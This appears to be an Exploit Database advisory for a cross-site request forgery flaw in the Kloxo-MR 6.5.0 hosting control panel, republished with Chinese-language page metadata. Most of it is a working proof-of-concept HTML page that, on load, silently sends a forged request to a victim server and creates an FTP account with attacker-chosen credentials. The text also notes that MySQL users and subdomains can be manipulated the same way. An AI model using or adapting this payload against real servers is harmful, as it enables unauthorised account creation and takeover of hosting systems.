Kloxo-MR 6.5.0 – Cross-Site Request Forgery

• Exploit Database
• 17 阅读

• 作者： Necmettin COSKUN
  日期： 2014-04-02
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/32666/

• # Exploit Title		:Kloxo-MR 6.5.0 CSRF Vulnerability
  # Vendor Homepage	:https://github.com/mustafaramadhan/kloxo/tree/dev
  # Version	:Kloxo-MR 6.5.0.f-2014020301
  # Tested on			:Centos 6.4
  # Exploit Author	:Necmettin COSKUN =>@babayarisi
  # Blog				:http://www.ncoskun.com http://www.grisapka.org
  # Discovery date	:03/12/2014
  # CVE				:N/A
   
  Kloxo-MR is special edition (fork) of Kloxo with many features not existing on Kloxo official release (6.1.12+).
  This fork named as Kloxo-MR (meaning 'Kloxo fork by Mustafa Ramadhan').
  ================
  CSRF Vulnerability
   
  Vulnerability
  ================
  Kloxo-MR has lots of POST and GET based form applications like Kloxo stable , some inputs escaped from specialchars but inputs dont have any csrf protection or secret key 
  So an remote attacker can manipulate this forms to add/delete mysql user,create/delete subdomains or add/delete ftp accounts.
  
  Poc Exploit
  ================
  
   <html>
   <head><title>Kloxo-MR demo</title></head>
   <script type="text/javascript">
   function yurudi(){
  		///////////////////////////////////////////////////////////
  		//Kloxo-MR 6.5.0CSRF Vulnerability		 //	
  		//Author:Necmettin COSKUN => twitter.com/@babayarisi	 //
  		//Blog: http://www.ncoskun.com | http://www.grisapka.org //
  		///////////////////////////////////////////////////////////
  		//Remote host
  		var host="victim.com";	
  		//New Ftp Username
  		var username="demouser";
  		//New Ftp Password
  		var pass="12345678";
  		//This creates new folder under admin dir. /admin/yourfolder
  		var dir="demodirectory";
  		//If necessary only modify http to https ;)
  		var urlson="http://"+host+":7778//display.php?frm_o_cname=ftpuser&frm_dttype&frm_ftpuser_c_nname="+username+"&frm_ftpuser_c_complete_name_f=--direct--&frm_ftpuser_c_password="+pass+"&frm_confirm_password="+pass+"&frm_ftpuser_c_directory="+dir+"&frm_ftpuser_c_ftp_disk_usage&frm_action=add";
  
  		document.getElementById('demoexploit').src=urlson;
  }
   </script>
   <body onload="yurudi();">
   <img id="demoexploit" src="https://www.exploit-db.com/exploits/32666/"></img>
   </body>
   </html>
   
   
  Discovered by:
  ================
  Necmettin COSKUN|GrisapkaGuvenlikGrubu|4ewa2getha!